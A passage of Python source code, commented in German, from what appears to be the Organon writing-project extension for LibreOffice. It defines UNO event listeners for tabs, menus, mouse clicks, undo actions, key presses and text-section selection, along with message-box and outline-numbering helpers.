in range(len(self.custom_tab)):\n summe = 0\n for j in range(i+1):\n if self.custom_tab['tab%sx'%(j)] != 0:\n summe += self.custom_tab['tab%sx'%(j)]\n else:\n summe += self.default_tab['tab%sx'%(j)]\n self.new_tabs.update( {'tab%sx'%(i) : summe} )\n self.new_tabs.update( {'tab%s'%(i) : summe} )\n\nclass Gliederung():\n def rechne(self,tree): \n if debug: log(inspect.stack)\n \n root = tree.getroot()\n all_elem = root.findall('.//')\n \n self.lvls = {}\n for i in range(10):\n self.lvls.update({i: 0})\n\n gliederung = {}\n lvl = 1\n \n for el in all_elem:\n \n lvl_el = int(el.attrib['Lvl']) + 1\n \n if lvl_el == lvl:\n self.lvls[lvl] += 1\n elif lvl_el > lvl:\n self.lvls[lvl+1] += 1\n lvl += 1\n elif lvl_el < lvl:\n self.lvls[lvl_el] += 1\n lvl = lvl_el #self.lvls[lvl_el]\n for i in range(lvl,10):\n self.lvls[i+1] = 0\n \n glied = ''\n for l in range(lvl_el):\n glied = glied + str(self.lvls[l+1]) + '.'\n \n gliederung.update({el.tag:glied})\n\n return gliederung \n \n \nfrom com.sun.star.awt import XTabListener\nclass Tab_Listener(unohelper.Base,XTabListener):\n \n def __init__(self,mb):\n if mb.debug: log(inspect.stack)\n \n self.mb = mb\n # Obwohl der Tab_Listener nur einmal gesetzt wird, wird activated immer 2x aufgerufen (Bug?)\n # Um den Code nicht doppelt auszufuehren, wird id_old verwendet\n self.id_old = None\n \n\n def inserted(self,id):return False\n def removed(self,id):return False\n def changed(self,id):return False\n def activated(self,id):\n if self.mb.debug: log(inspect.stack)\n \n # activated wird beim Erzeugen eines neuen tabs\n # gerufen, bevor self.mb.tabs gesetzt wurde. Daher hier try/except\n # T.AB wird stattdessen in erzeuge_neuen_tab() gesetzt \n \n try:\n if id != self.id_old:\n \n if self.mb.props[T.AB].tastatureingabe:\n tab_name = self.mb.tabs[self.mb.tab_id_old][1]\n \n ordinal = self.mb.props[tab_name].selektierte_zeile\n bereichsname = self.mb.props[T.AB].dict_bereiche['ordinal'][ordinal]\n\n path = uno.systemPathToFileUrl(self.mb.props[T.AB].dict_bereiche['Bereichsname'][bereichsname])\n\n self.mb.class_Bereiche.datei_nach_aenderung_speichern(path,bereichsname) \n self.mb.props[T.AB].tastatureingabe = False\n\n self.mb.active_tab_id = id\n sichtbare_bereiche = self.mb.props['Projekt'].sichtbare_bereiche\n try:\n # Wenn neuer Tab erzeugt wird, wird hier ein Fehler erzeugt.\n # Ist aber egal\n T.AB = self.mb.tabs[id][1]\n except:\n pass\n self.mb.props['Projekt'].sichtbare_bereiche = sichtbare_bereiche\n self.mb.class_Zeilen_Listener.schalte_sichtbarkeit_der_Bereiche()\n\n if self.mb.props[T.AB].selektierte_zeile_alt != None:\n ctrl_alt = self.mb.props[T.AB].Hauptfeld.getControl(self.mb.props[T.AB].selektierte_zeile_alt).getControl('textfeld')\n self.mb.class_Sidebar.passe_sb_an(ctrl_alt)\n \n \n self.id_old = id\n except:\n log(inspect.stack,tb())\n\n \n def deactivated(self,id):\n if self.mb.debug: log(inspect.stack)\n \n self.mb.tab_id_old = id\n return False\n def disposing(self,arg):return False\n \n\nfrom com.sun.star.awt import XMouseListener, XItemListener\nfrom com.sun.star.awt.MouseButton import LEFT as MB_LEFT \n \nclass Menu_Leiste_Listener (unohelper.Base, XMouseListener):\n def __init__(self,mb):\n if mb.debug: log(inspect.stack)\n \n self.mb = mb\n self.menu_Kopf_Eintrag = 'None'\n self.mb.geoeffnetesMenu = None\n \n def mousePressed(self, ev):\n if ev.Buttons == MB_LEFT:\n if self.mb.debug: log(inspect.stack)\n try:\n controls = []\n \n if self.menu_Kopf_Eintrag == 'Test':\n self.mb.Test() \n return\n \n else:\n items = menuEintraege(LANG,self.menu_Kopf_Eintrag)\n if self.menu_Kopf_Eintrag == LANG.ANSICHT:\n controls,listener,Hoehe,Breite = self.mb.erzeuge_Menu_DropDown_Eintraege_Ansicht(items)\n else:\n controls,listener,Hoehe,Breite = self.mb.erzeuge_Menu_DropDown_Eintraege(items)\n controls = list((x,'') for x in controls)\n\n loc_cont = self.mb.current_Contr.Frame.ContainerWindow.AccessibleContext.LocationOnScreen\n \n x = self.mb.dialog.AccessibleContext.LocationOnScreen.X - loc_cont.X + ev.Source.PosSize.X\n y = self.mb.dialog.AccessibleContext.LocationOnScreen.Y - loc_cont.Y + ev.Source.PosSize.Y + 20\n posSize = x,y,Breite +20,Hoehe +20\n\n oWindow,cont = self.mb.erzeuge_Dialog_Container(posSize,1+512)\n\n # Listener fuers Dispose des Fensters\n listener2 = Schliesse_Menu_Listener(self.mb)\n cont.addMouseListener(listener2) \n listener2.ob = oWindow\n \n\n self.mb.geoeffnetesMenu = self.menu_Kopf_Eintrag\n listener.window = oWindow\n self.mb.menu_fenster = oWindow \n \n for c in controls:\n cont.addControl(c[1],c[0])\n except:\n log(inspect.stack,tb())\n \n\n def mouseEntered(self, ev):\n if self.mb.debug: log(inspect.stack)\n \n ev.value.Source.Model.FontUnderline = 1 \n if self.menu_Kopf_Eintrag != ev.value.Source.Text:\n self.menu_Kopf_Eintrag = ev.value.Source.Text \n if None not in (self.menu_Kopf_Eintrag,self.mb.geoeffnetesMenu):\n if self.menu_Kopf_Eintrag != self.mb.geoeffnetesMenu:\n self.mb.menu_fenster.dispose()\n \n return False\n \n def mouseExited(self, ev): \n if self.mb.debug: log(inspect.stack)\n \n ev.value.Source.Model.FontUnderline = 0\n return False\n def mouseReleased(self,ev):\n return False\n def disposing(self,ev):\n return False\n\nclass Menu_Leiste_Listener2 (unohelper.Base, XMouseListener):\n def __init__(self,mb):\n if mb.debug: log(inspect.stack)\n \n self.mb = mb\n self.geklickterMenupunkt = None\n \n def mousePressed(self, ev):\n if self.mb.debug: log(inspect.stack)\n \n if ev.Buttons == 1:\n if self.mb.debug: log(inspect.stack)\n \n if self.mb.projekt_name != None:\n \n if ev.Source.Model.HelpText == LANG.INSERT_DOC: \n self.mb.class_Baumansicht.erzeuge_neue_Zeile('dokument')\n \n if ev.Source.Model.HelpText == LANG.INSERT_DIR: \n self.mb.class_Baumansicht.erzeuge_neue_Zeile('Ordner')\n \n if ev.Source.Model.HelpText[:10] == LANG.FORMATIERUNG_SPEICHERN[:10]:\n\n props = self.mb.props[T.AB]\n zuletzt = props.selektierte_zeile_alt\n bereichsname = props.dict_bereiche['ordinal'][zuletzt]\n path = props.dict_bereiche['Bereichsname'][bereichsname]\n self.mb.props[T.AB].tastatureingabe = True\n\n self.mb.class_Bereiche.datei_nach_aenderung_speichern(uno.systemPathToFileUrl(path),bereichsname)\n\n self.mb.loesche_undo_Aktionen()\n return False\n \n def mouseExited(self,ev):\n return False\n def mouseEntered(self,ev):\n if ev.Source.Model.HelpText[:10] == LANG.FORMATIERUNG_SPEICHERN[:10]:\n ev.Source.Model.HelpText = LANG.FORMATIERUNG_SPEICHERN.format(self.get_zuletzt_benutzte_datei())\n \n def mouseReleased(self,ev):\n return False\n def disposing(self,ev):\n return False\n \n def get_zuletzt_benutzte_datei(self):\n if self.mb.debug: log(inspect.stack)\n try:\n props = self.mb.props[T.AB]\n zuletzt = props.selektierte_zeile_alt\n xml = props.xml_tree\n root = xml.getroot()\n return root.find('.//' + zuletzt).attrib['Name']\n except:\n return 'None'\n\nclass Auswahl_Menu_Eintrag_Listener(unohelper.Base, XMouseListener):\n def __init__(self,mb):\n if mb.debug: log(inspect.stack)\n \n self.mb = mb\n self.window = None\n # Wenn dieser Listener von den Texttools aus gerufen wird,\n # wird win2 auf das normale Menufenster gesetzt und disposiert\n self.texttools = False\n self.win2 = None\n \n def mousePressed(self, ev):\n if self.mb.debug: log(inspect.stack) \n try:\n sel = ev.Source.Text\n if sel not in [LANG.TEXTTOOLS,]:\n self.do()\n\n if sel == LANG.NEW_PROJECT:\n self.mb.class_Projekt.erzeuge_neues_Projekt()\n \n elif sel == LANG.OPEN_PROJECT:\n self.mb.class_Projekt.lade_Projekt()\n \n elif sel == LANG.NEW_DOC:\n self.mb.class_Baumansicht.erzeuge_neue_Zeile('dokument')\n \n elif sel == LANG.NEW_DIR:\n self.mb.class_Baumansicht.erzeuge_neue_Zeile('Ordner')\n \n elif sel == LANG.EXPORT_2:\n self.mb.class_Export.export()\n \n elif sel == LANG.IMPORT_2:\n self.mb.class_Import.importX()\n \n elif sel == LANG.UNFOLD_PROJ_DIR:\n self.mb.class_Funktionen.projektordner_ausklappen()\n \n elif sel == LANG.NEUER_TAB:\n self.mb.class_Tabs.start(False)\n \n elif sel == LANG.SCHLIESSE_TAB:\n self.mb.class_Tabs.schliesse_Tab()\n \n elif sel == LANG.ZEIGE_TEXTBEREICHE:\n oBool = self.mb.current_Contr.ViewSettings.ShowTextBoundaries\n self.mb.current_Contr.ViewSettings.ShowTextBoundaries = not oBool \n \n elif sel == LANG.HOMEPAGE:\n webbrowser.open('https://github.com/XRoemer/Organon')\n \n elif sel == LANG.FEEDBACK:\n webbrowser.open('http://organon4office.wordpress.com/')\n \n elif sel == LANG.BACKUP:\n self.mb.erzeuge_Backup()\n \n elif sel == LANG.TRENNE_TEXT:\n self.mb.class_Funktionen.teile_text()\n \n elif sel == LANG.IMPORTIERE_IN_TAB:\n self.mb.class_Tabs.start(True)\n \n elif sel == LANG.CLEAR_RECYCLE_BIN: \n self.mb.leere_Papierkorb()\n \n elif sel == LANG.TRENNER: \n self.mb.erzeuge_Trenner_Enstellungen()\n \n elif sel == LANG.TEXTVERGLEICH: \n self.mb.class_Zitate.start()\n \n elif sel == LANG.TEXTTOOLS: \n self.mb.texttools_geoeffnet = True\n self.mb.erzeuge_texttools_fenster(ev,self.window)\n \n elif sel == LANG.WOERTERLISTE: \n self.mb.class_werkzeug_wListe.start()\n \n elif sel == LANG.ERZEUGE_INDEX: \n self.mb.class_Index.start()\n \n elif sel == LANG.EINSTELLUNGEN:\n self.mb.class_Einstellungen.start()\n \n elif sel == LANG.ORGANIZER:\n self.mb.class_Organizer.run()\n \n self.mb.loesche_undo_Aktionen()\n except:\n log(inspect.stack,tb())\n \n def do(self): \n if self.mb.debug: log(inspect.stack)\n self.window.dispose()\n self.mb.geoeffnetesMenu = None\n # damit der Zeilen_Listener nicht auf mouse_released reagiert,\n # wenn das fenster geschlossen wird\n self.mb.class_Zeilen_Listener.menu_geklickt = True\n if self.texttools:\n self.texttools = False\n self.win2.dispose()\n self.mb.texttools_geoeffnet = False\n\n def mouseExited(self,ev):\n ev.value.Source.Model.FontWeight = 100\n return False\n def mouseEntered(self,ev):\n ev.value.Source.Model.FontWeight = 150\n return False\n def mouseReleased(self,ev):\n return False\n def disposing(self,ev):\n return False\n \n \nclass Schliesse_Menu_Listener (unohelper.Base, XMouseListener):\n def __init__(self,mb,texttools=False):\n if mb.debug: log(inspect.stack)\n \n self.ob = None\n self.mb = mb\n self.texttools = texttools\n \n def mousePressed(self, ev):\n return False\n \n def mouseExited(self, ev): \n if self.mb.debug: log(inspect.stack)\n \n #print('texttools',self.mb.texttools_geoeffnet,self.texttools)\n \n if self.mb.texttools_geoeffnet and self.texttools == False:\n return\n\n point = uno.createUnoStruct('com.sun.star.awt.Point')\n point.X = ev.X\n point.Y = ev.Y\n\n enthaelt_Punkt = ev.Source.AccessibleContext.containsPoint(point)\n\n if not enthaelt_Punkt: \n self.ob.dispose() \n self.mb.geoeffnetesMenu = None \n \n if self.texttools:\n self.mb.texttools_geoeffnet = False\n \n return False\n \n\n def mouseEntered(self,ev):\n return False\n def mouseReleased(self,ev):\n return False\n def disposing(self,ev):\n return False\n\n\nclass DropDown_Tags_TV_Listener(unohelper.Base, XMouseListener):\n def __init__(self,mb):\n if mb.debug: log(inspect.stack)\n \n self.mb = mb\n \n def mouseExited(self, ev):\n ev.value.Source.Model.FontWeight = 100\n return False\n def mouseEntered(self,ev):\n ev.value.Source.Model.FontWeight = 150\n return False\n def mouseReleased(self,ev):\n return False\n def disposing(self,ev):\n return False\n def mousePressed(self, ev): \n if self.mb.debug: log(inspect.stack)\n \n try:\n text = ev.Source.Text\n sett = self.mb.settings_proj\n \n \n if text == LANG.SHOW_TAG1:\n nummer = 1\n lang_show_tag = LANG.SHOW_TAG1\n \n elif text == LANG.SHOW_TAG2:\n if not self.pruefe_galerie_eintrag():\n return\n nummer = 2\n lang_show_tag = LANG.SHOW_TAG2\n \n elif text == LANG.GLIEDERUNG:\n nummer = 3\n lang_show_tag = LANG.GLIEDERUNG\n \n tag = 'tag%s'%nummer\n sett[tag] = not sett[tag]\n \n self.mache_tag_sichtbar(sett[tag],tag)\n ctrl = ev.Source.Context.getControl(lang_show_tag+'_icon')\n \n if sett[tag]:\n ctrl.Model.ImageURL = 'private:graphicrepository/svx/res/apply.png' \n else:\n ctrl.Model.ImageURL = '' \n \n self.mb.speicher_settings(\"project_settings.txt\", self.mb.settings_proj) \n except:\n log(inspect.stack,tb())\n \n \n \n \n def mache_tag_sichtbar(self,sichtbar,tag_name):\n if self.mb.debug: log(inspect.stack)\n \n sett = self.mb.settings_proj\n tags = sett['tag1'],sett['tag2'],sett['tag3']\n \n for tab_name in self.mb.props:\n \n # alle Zeilen\n controls_zeilen = self.mb.props[tab_name].Hauptfeld.Controls\n tree = self.mb.props[tab_name].xml_tree\n root = tree.getroot()\n \n gliederung = None\n if sett['tag3']:\n gliederung = self.mb.class_Gliederung.rechne(tree)\n \n if not sichtbar:\n for contr_zeile in controls_zeilen:\n ord_zeile = contr_zeile.AccessibleContext.AccessibleName\n if ord_zeile == self.mb.props[T.AB].Papierkorb:\n continue\n \n self.mb.class_Baumansicht.positioniere_icons_in_zeile(contr_zeile,tags,gliederung)\n tag_contr = contr_zeile.getControl(tag_name)\n tag_contr.dispose()\n \n \n if sichtbar:\n for contr_zeile in controls_zeilen: \n\n ord_zeile = contr_zeile.AccessibleContext.AccessibleName\n if ord_zeile == self.mb.props[T.AB].Papierkorb:\n continue\n \n zeile_xml = root.find('.//'+ord_zeile)\n \n if tag_name == 'tag1':\n farbe = zeile_xml.attrib['Tag1']\n url = 'vnd.sun.star.extension://xaver.roemers.organon/img/punkt_%s.png' % farbe\n listener = self.mb.class_Baumansicht.tag1_listener\n elif tag_name == 'tag2':\n url = zeile_xml.attrib['Tag2']\n listener = self.mb.class_Baumansicht.tag2_listener\n elif tag_name == 'tag3':\n url = ''\n \n if tag_name in ('tag1','tag2'):\n PosX,PosY,Width,Height = 0,2,16,16\n control_tag1, model_tag1 = self.mb.createControl(self.mb.ctx,\"ImageControl\",PosX,PosY,Width,Height,(),() ) \n model_tag1.ImageURL = url\n model_tag1.Border = 0\n control_tag1.addMouseListener(listener)\n else:\n PosX,PosY,Width,Height = 0,2,16,16\n control_tag1, model_tag1 = self.mb.createControl(self.mb.ctx,\"FixedText\",PosX,PosY,Width,Height,(),() ) \n model_tag1.TextColor = KONST.FARBE_GLIEDERUNG\n \n contr_zeile.addControl(tag_name,control_tag1)\n self.mb.class_Baumansicht.positioniere_icons_in_zeile(contr_zeile,tags,gliederung)\n \n \n def pruefe_galerie_eintrag(self):\n if self.mb.debug: log(inspect.stack)\n \n gallery = self.mb.createUnoService(\"com.sun.star.gallery.GalleryThemeProvider\")\n \n if 'Organon Icons' not in gallery.ElementNames:\n \n paths = self.mb.smgr.createInstance( \"com.sun.star.util.PathSettings\" )\n gallery_pfad = uno.fileUrlToSystemPath(paths.Gallery_writable)\n gallery_ordner = os.path.join(gallery_pfad,'Organon Icons')\n \n entscheidung = self.mb.nachricht(LANG.BENUTZERDEFINIERTE_SYMBOLE_NUTZEN %gallery_ordner,\"warningbox\",16777216)\n # 3 = Nein oder Cancel, 2 = Ja\n if entscheidung == 3:\n return False\n elif entscheidung == 2:\n try:\n iGal = gallery.insertNewByName('Organon Icons') \n path_icons = os.path.join(self.mb.path_to_extension,'img','Organon Icons')\n \n from shutil import copy \n \n # Galerie anlegen\n if not os.path.exists(gallery_ordner):\n os.makedirs(gallery_ordner)\n \n # Organon Icons einfuegen\n for (dirpath,dirnames,filenames) in os.walk(path_icons):\n for f in filenames:\n url_source = os.path.join(dirpath,f)\n url_dest = os.path.join(gallery_ordner,f)\n \n copy(url_source,url_dest)\n \n url = uno.systemPathToFileUrl(url_dest)\n iGal.insertURLByIndex(url,0)\n \n return True\n \n except:\n log(inspect.stack,tb())\n \n return True\n\nclass DropDown_Tags_SB_Listener(unohelper.Base, XMouseListener):\n def __init__(self,mb):\n if mb.debug: log(inspect.stack)\n self.mb = mb\n def mouseExited(self, ev):\n ev.value.Source.Model.FontWeight = 100\n return False\n def mouseEntered(self,ev):\n ev.value.Source.Model.FontWeight = 150\n return False\n def mouseReleased(self,ev):\n return False\n def disposing(self,ev):\n return False\n def mousePressed(self, ev): \n if self.mb.debug: log(inspect.stack) \n try:\n name = ev.Source.Text \n ctrl = ev.Source.Context.getControl(name+'_icon') \n #state = ev.Source.State\n \n panels = self.mb.class_Sidebar.sb_panels2\n if ctrl.Model.ImageURL == 'private:graphicrepository/svx/res/apply.png':\n self.mb.dict_sb['sichtbare'].remove(panels[name])\n ctrl.Model.ImageURL = '' \n else:\n self.mb.dict_sb['sichtbare'].append(panels[name])\n ctrl.Model.ImageURL = 'private:graphicrepository/svx/res/apply.png' \n \n \n # Wenn die Sidebar sichtbar ist, auf und zu schalten,\n # um den Sidebar tag sichtbar zu machen \n try:\n controls = self.mb.dict_sb['controls']\n if controls != {}:\n okey = list(controls)[0]\n xParent = controls[okey][0].xParentWindow\n if xParent.isVisible():\n self.mb.class_Sidebar.schalte_sidebar_button()\n #pd()\n ev.Source.setFocus()\n except:\n log(inspect.stack,tb()) \n \n except:\n log(inspect.stack,tb()) \n\n\n \nfrom com.sun.star.awt import Rectangle\nfrom com.sun.star.awt import WindowDescriptor \nfrom com.sun.star.awt.WindowClass import MODALTOP\nfrom com.sun.star.awt.VclWindowPeerAttribute import OK,YES_NO_CANCEL, DEF_NO\n\nclass Mitteilungen():\n def __init__(self,ctx,mb):\n if mb.debug: log(inspect.stack)\n \n self.ctx = ctx\n self.mb = mb \n \n def nachricht(self, MsgText, MsgType=\"errorbox\", MsgButtons=OK): \n if self.mb.debug: log(inspect.stack) \n\n smgr = self.ctx.ServiceManager\n desktop = smgr.createInstanceWithContext( \"com.sun.star.frame.Desktop\",self.ctx)\n doc = desktop.getCurrentComponent() \n ParentWin = doc.CurrentController.Frame.ContainerWindow\n\n MsgTitle = \"Mitteilung\"\n MsgType = MsgType.lower()\n #available msg types\n MsgTypes = (\"messbox\", \"infobox\", \"errorbox\", \"warningbox\", \"querybox\")\n \n if MsgType not in MsgTypes:\n MsgType = \"messbox\"\n \n #describe window properties.\n aDescriptor = WindowDescriptor()\n aDescriptor.Type = MODALTOP\n aDescriptor.WindowServiceName = MsgType\n aDescriptor.ParentIndex = -1\n aDescriptor.Parent = ParentWin\n aDescriptor.Bounds = Rectangle()\n aDescriptor.WindowAttributes = MsgButtons\n \n tk = ParentWin.getToolkit()\n msgbox = tk.createWindow(aDescriptor)\n msgbox.MessageText = MsgText\n\n x = msgbox.execute()\n msgbox.dispose()\n return x\n \n def kurze_mitteilung(self):\n pass\n\nfrom com.sun.star.document import XUndoManagerListener \nclass Undo_Manager_Listener(unohelper.Base,XUndoManagerListener): \n \n def __init__(self,mb):\n if mb.debug: log(inspect.stack)\n \n self.mb = mb \n self.textbereiche = ()\n \n \n def enteredContext(self,ev):\n if self.mb.use_UM_Listener == False:\n return\n if ev.UndoActionTitle == self.mb.BEREICH_EINFUEGEN:\n if self.mb.debug: log(inspect.stack)\n \n if self.mb.doc.TextSections.Count == 0:\n self.textbereiche = ()\n else:\n self.textbereiche = self.mb.doc.TextSections.ElementNames\n \n \n def leftContext(self,ev):\n if self.mb.use_UM_Listener == False:\n return\n if ev.UndoActionTitle == self.mb.BEREICH_EINFUEGEN:\n if self.mb.debug: log(inspect.stack)\n \n for tbe in self.mb.doc.TextSections.ElementNames:\n if 'trenner' not in tbe:\n if tbe not in self.textbereiche:\n self.bereich_in_OrganonSec_einfuegen(tbe)\n \n \n def undoActionAdded(self,ev):return False\n def actionUndone(self,ev):return False\n def actionRedone(self,ev):return False\n def allActionsCleared(self,ev):return False\n def redoActionsCleared(self,ev):return False\n def resetAll(self,ev):return False\n def enteredHiddenContext(self,ev):return False\n def leftHiddenContext(self,ev):return False\n def cancelledContext(self,ev):return False\n def disposing(self,ev):return False\n \n def bereich_in_OrganonSec_einfuegen(self,tbe):\n if self.mb.debug: log(inspect.stack)\n \n text = self.mb.doc.Text\n vc = self.mb.viewcursor\n TS = self.mb.doc.TextSections\n \n sec = TS.getByName(tbe)\n sec_name = sec.Name\n \n if sec.ParentSection == None:\n \n position_neuer_Bereich = None\n \n cur2 = self.mb.doc.Text.createTextCursorByRange(vc)\n cur2.collapseToStart()\n cur2.goLeft(1,False)\n \n if cur2.TextSection == sec:\n position_neuer_Bereich = 'davor'\n \n else:\n cur2.gotoRange(vc,False)\n cur2.collapseToEnd()\n cur2.goRight(1,False)\n \n if cur2.TextSection == sec:\n position_neuer_Bereich = 'danach'\n \n cur = self.mb.doc.Text.createTextCursorByRange(vc)\n cur.collapseToEnd()\n \n if position_neuer_Bereich == 'davor':\n \n cur.gotoRange(sec.Anchor,True)\n cur.setString('')\n self.mb.doc.Text.insertString(vc,' ',False)\n cur.gotoRange(vc,False)\n goLeft = 1\n \n elif position_neuer_Bereich == 'danach':\n \n self.mb.doc.Text.insertString(vc,' ',False)\n \n cur.gotoRange(sec.Anchor,True)\n cur.setString('')\n cur.gotoRange(vc,False)\n cur.goLeft(1,False)\n goLeft = 2\n \n else:\n return\n \n newSection = self.mb.doc.createInstance(\"com.sun.star.text.TextSection\")\n newSection.setName(sec_name)\n \n self.mb.undo_mgr.removeUndoManagerListener(self.mb.undo_mgr_listener)\n self.mb.doc.Text.insertTextContent(cur,newSection,False)\n self.mb.undo_mgr.addUndoManagerListener(self.mb.undo_mgr_listener)\n \n vc.goLeft(goLeft,False)\n\n # Wenn ein Bereich eingefuegt wurde, auf jeden Fall speichern\n section = vc.TextSection\n while section != None:\n bereichsname = section.Name\n section = section.ParentSection\n \n path = self.mb.props[T.AB].dict_bereiche['Bereichsname'][bereichsname]\n path = uno.systemPathToFileUrl(path)\n self.mb.props[T.AB].tastatureingabe = True\n self.mb.class_Bereiche.datei_nach_aenderung_speichern(path,bereichsname)\n \n\nfrom com.sun.star.awt import XKeyHandler\nclass Key_Handler(unohelper.Base, XKeyHandler):\n \n def __init__(self,mb):\n if mb.debug: log(inspect.stack)\n \n self.mb = mb\n self.mb.keyhandler = self\n mb.current_Contr.addKeyHandler(self)\n \n def keyPressed(self,ev):\n #print(ev.KeyChar)\n self.mb.props[T.AB].tastatureingabe = True\n self.mb.props[T.AB].zuletzt_gedrueckte_taste = ev\n return False\n \n def keyReleased(self,ev):\n \n if self.mb.projekt_name != None:\n # Wenn eine OrganonSec durch den Benutzer geloescht wird, wird die Aktion rueckgaengig gemacht\n # KeyCodes: backspace, delete\n if ev.KeyCode in (1283,1286):\n anz_im_bereiche_dict = len(self.mb.props[T.AB].dict_bereiche['ordinal'])\n anz_im_dok = 0\n for sec in self.mb.doc.TextSections.ElementNames:\n if 'OrganonSec' in sec:\n anz_im_dok += 1\n if anz_im_dok < anz_im_bereiche_dict:\n if self.mb.debug: log(inspect.stack)\n self.mb.doc.UndoManager.undo()\n return False\n\n\nfrom com.sun.star.view import XSelectionChangeListener\nclass ViewCursor_Selection_Listener(unohelper.Base, XSelectionChangeListener):\n \n def __init__(self,mb):\n if mb.debug: log(inspect.stack)\n \n self.mb = mb\n self.ts_old = 'nicht vorhanden'\n self.mb.selbstruf = False\n \n def disposing(self,ev):\n if self.mb.debug: log(inspect.stack)\n return False\n \n def selectionChanged(self,ev):\n if self.mb.debug: log(inspect.stack)\n\n try:\n if self.mb.selbstruf:\n #if self.mb.debug: print('selection selbstruf')\n return False\n \n selected_ts = self.mb.current_Contr.ViewCursor.TextSection \n if selected_ts == None:\n return False\n #log(inspect.stack,extras=selected_ts.Name)\n s_name = selected_ts.Name\n\n # stellt sicher, dass nur selbst erzeugte Bereiche angesprochen werden\n # und der Trenner uebersprungen wird\n if 'trenner' in s_name:\n\n if self.mb.props[T.AB].zuletzt_gedrueckte_taste == None:\n try:\n self.mb.viewcursor.goDown(1,False)\n except:\n self.mb.viewcursor.goUp(1,False)\n return False\n # 1024,1027 Pfeil runter,rechts\n elif self.mb.props[T.AB].zuletzt_gedrueckte_taste.KeyCode in (1024,1027): \n self.mb.viewcursor.goDown(1,False) \n else:\n self.mb.viewcursor.goUp(1,False)\n # sollte der viewcursor immer noch auf einem Trenner stehen,\n # befindet er sich im letzten Bereich -> goUp \n if 'trenner' in self.mb.viewcursor.TextSection.Name:\n self.mb.viewcursor.goUp(1,False)\n return False \n \n # test ob ausgewaehlter Bereich ein Kind-Bereich ist -> Selektion wird auf Parent gesetzt\n elif 'trenner' not in s_name and 'OrganonSec' not in s_name:\n sec = []\n self.test_for_parent_section(selected_ts,sec)\n selected_ts = sec[0]\n s_name = selected_ts.Name\n #log(inspect.stack,extras=s_name)\n # steht nach test_for... selcted_text... nicht auf einer OrganonSec, \n # ist der Bereich außerhalb des Organon trees\n if 'OrganonSec' not in selected_ts.Name:\n return False\n \n props = self.mb.props \n \n self.so_name = None \n\n if self.mb.props[T.AB].selektierte_zeile_alt != None:\n ts_old_bereichsname = self.mb.props[T.AB].dict_bereiche['ordinal'][self.mb.props[T.AB].selektierte_zeile_alt]\n self.ts_old = self.mb.doc.TextSections.getByName(ts_old_bereichsname) \n self.so_name = self.mb.props[T.AB].dict_bereiche['ordinal'][self.mb.props[T.AB].selektierte_zeile_alt]\n #pd()\n if self.ts_old == 'nicht vorhanden':\n #print('selek gewechs, old nicht vorhanden')\n self.ts_old = selected_ts \n ordinal = self.mb.props[T.AB].dict_bereiche['Bereichsname-ordinal'][s_name]\n self.mb.props[T.AB].selektierte_zeile = ordinal\n self.mb.props[T.AB].selektierte_zeile_alt = ordinal\n return False \n \n elif self.mb.props[T.AB].Papierkorb_geleert == True:\n #print('selek gewechs, Papierkorb_geleert')\n # fehlt: nur speichern, wenn die Datei nicht im Papierkorb gelandet ist\n self.mb.class_Bereiche.datei_nach_aenderung_speichern(self.ts_old.FileLink.FileURL,self.so_name)\n self.ts_old = selected_ts \n self.mb.props[T.AB].Papierkorb_geleert = False \n return False \n else:\n if self.ts_old == selected_ts:\n #print('selek nix gewechs',self.so_name , s_name)\n return False \n else:\n #print('selek gewechs',self.so_name , s_name) \n self.farbe_der_selektion_aendern(selected_ts.Name)\n if self.mb.props[T.AB].tastatureingabe:\n self.mb.class_Bereiche.datei_nach_aenderung_speichern(self.ts_old.FileLink.FileURL,self.so_name)\n \n self.ts_old = selected_ts \n except:\n log(inspect.stack,tb())\n\n \n def test_for_parent_section(self,selected_text_sectionX,sec):\n if self.mb.debug: log(inspect.stack)\n \n if selected_text_sectionX.ParentSection != None:\n selected_text_sectionX = selected_text_sectionX.ParentSection\n self.test_for_parent_section(selected_text_sectionX,sec)\n else:\n sec.append(selected_text_sectionX)\n \n \n def farbe_der_selektion_aendern(self,bereichsname): \n if self.mb.debug: log(inspect.stack) \n\n ordinal = self.mb.props[T.AB].dict_bereiche['Bereichsname-ordinal'][bereichsname]\n zeile = self.mb.props[T.AB].Hauptfeld.getControl(ordinal)\n textfeld = zeile.getControl('textfeld')\n \n self.mb.props[T.AB].selektierte_zeile = zeile.AccessibleContext.AccessibleName\n # selektierte Zeile einfaerben, ehem. sel. Zeile zuruecksetzen\n textfeld.Model.BackgroundColor = KONST.FARBE_AUSGEWAEHLTE_ZEILE \n if self.mb.props[T.AB].selektierte_zeile_alt != None: \n ctrl = self.mb.props[T.AB].Hauptfeld.getControl(self.mb.props[T.AB].selektierte_zeile_alt).getControl('textfeld') \n ctrl.Model.BackgroundColor = KONST.FARBE_HF_HINTERGRUND\n self.mb.class_Sidebar.passe_sb_an(textfeld)\n self.mb.props[T.AB].selektierte_zeile_alt = textfeld.Context.AccessibleContext.AccessibleName\n \n\nfrom com.sun.star.awt import XAdjustmentListener\nclass ScrollBar_Listener (unohelper.Base,XAdjustmentListener):\n def __init__(self,debug,fenster_cont): \n if debug: log(inspect.stack) \n self.fenster_cont = fenster_cont\n def adjustmentValueChanged(self,ev):\n self.fenster_cont.setPosSize(0, -ev.value.Value,0,0,2)\n def disposing(self,ev):\n return False\n\n \nfrom com.sun.star.awt import XWindowListener\nfrom com.sun.star.lang import XEventListener\nclass Dialog_Window_Listener(unohelper.Base,XWindowListener,XEventListener):\n \n def __init__(self,mb):\n if mb.debug: log(inspect.stack)\n \n self.mb = mb\n \n def windowResized(self,ev):\n #print('windowResized')\n self.korrigiere_hoehe_des_scrollbalkens()\n self.mb.class_Baumansicht.korrigiere_scrollbar()\n def windowMoved(self,ev):pass\n #print('windowMoved')\n def windowShown(self,ev):\n self.korrigiere_hoehe_des_scrollbalkens()\n #print('windowShown')\n def windowHidden(self,ev):pass\n\n def korrigiere_hoehe_des_scrollbalkens(self):\n if self.mb.debug: log(inspect.stack)\n \n try:\n active_tab = self.mb.active_tab_id\n win = self.mb.tabs[active_tab][0]\n nav_cont_aussen = win.getControl('Hauptfeld_aussen')\n\n # nav_cont_aussen ist None, wenn noch kein Projekt geoeffnet wurde\n if nav_cont_aussen != None:\n nav_cont = nav_cont_aussen.getControl('Hauptfeld')\n \n MenuBar = win.getControl('Organon_Menu_Bar')\n MBHoehe = MenuBar.PosSize.value.Height + MenuBar.PosSize.value.Y\n NCHoehe = 0 #nav_cont.PosSize.value.Height\n NCPosY = nav_cont.PosSize.value.Y\n Y = NCHoehe + NCPosY + MBHoehe\n Height = win.PosSize.value.Height - Y -25\n \n scrll = 